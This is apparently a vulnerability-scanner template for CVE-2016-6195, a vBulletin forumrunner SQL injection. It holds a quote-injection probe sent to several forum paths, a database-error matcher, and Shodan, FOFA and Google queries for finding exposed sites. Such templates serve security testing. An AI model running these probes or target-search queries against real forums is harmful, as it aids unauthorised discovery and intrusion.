vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.
PoC代码[已公开]
id: CVE-2016-6195
info:
name: vBulletin <= 4.2.3 - SQL Injection
author: MaStErChO
severity: critical
description: |
vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
remediation: |
Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor.
reference:
- https://www.cvedetails.com/cve/CVE-2016-6195/
- https://www.exploit-db.com/exploits/38489
- https://enumerated.wordpress.com/2016/07/11/1/
- http://www.vbulletin.org/forum/showthread.php?t=322848
- https://github.com/drewlong/vbully
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-6195
cwe-id: CWE-89
epss-score: 0.8643
epss-percentile: 0.99372
cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 6
vendor: vbulletin
product: vbulletin
shodan-query:
- title:"Powered By vBulletin"
- http.html:"powered by vbulletin"
- http.component:"vbulletin"
- http.title:"powered by vbulletin"
- cpe:"cpe:2.3:a:vbulletin:vbulletin"
fofa-query:
- body="powered by vbulletin"
- title="powered by vbulletin"
google-query:
- intext:"powered by vbulletin"
- intitle:"powered by vbulletin"
tags: cve2016,cve,vbulletin,sqli,forum,edb
http:
- method: GET
path:
- "{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
- "{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
- "{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
- "{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
- "{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
- "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
stop-at-first-match: true
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "type=dberror"
- type: status
status:
- 200
- 503
condition: or
# digest: 4a0a00473045022100b9a3977d0f6982848a0721f1a122fdb00bbcd4470b05c3c123d62d2da6dc72e302206e2172f92bcd66a085871d087611f381134f194f3004bc264dc99be3a08ae947:922c64590222798bb761d5b6d8e72950